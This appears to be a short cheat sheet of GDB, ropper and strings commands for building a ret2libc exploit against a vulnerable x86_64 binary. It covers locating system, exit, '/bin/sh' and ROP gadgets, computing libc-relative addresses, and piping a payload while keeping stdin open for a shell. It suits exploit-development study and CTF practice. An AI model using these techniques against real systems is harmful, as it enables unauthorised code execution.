Make sure to set a breakpoint and run the program before running below commands when trying from GDB # Find system address p system xinfo system #Find Exit address p exit #Chek if libc is being used or not - copy libc to current working directory for ease of use. # Copy Libc base address # Default path = /lib/x86_64-linux-gnu/libc-2.27.so vmmap libc #Find JMP RSP or JMP RAX or any other instruction # if you are unable to find an instruction in your vuln binary, search for the string in libc ropper file ./vuln or file ./libc search jmp rsp #if you are unable to find JMP instruction try CALL search call rsp #Finding "/bin/sh" find "/bin/sh" strings -a -t x libc-2.27.so | grep "/bin/sh" ropper --file libc-2.27.so --string '/bin/sh' # Search for ret instruction, look for a single ret without any other instructions. ropper --file libc-2.27.so --search "ret" 0x00000000000008aa: ret; #When you take an address from libc externally or using ropper, you need to add libc base address that you got from `vmmap libc` first address with the address that you got from ropper or strings. - its the same with any other instructions. #Change ropper serach depth - # 1 - 1 level down, /2/ - 2 levels down # better to pick a gadget that ends with ret for ret2libc ropper > file ./vuln_file or file ./libc > search /1/ pop rdi #Keep the STDIN open (cat payload;cat ) | ./vuln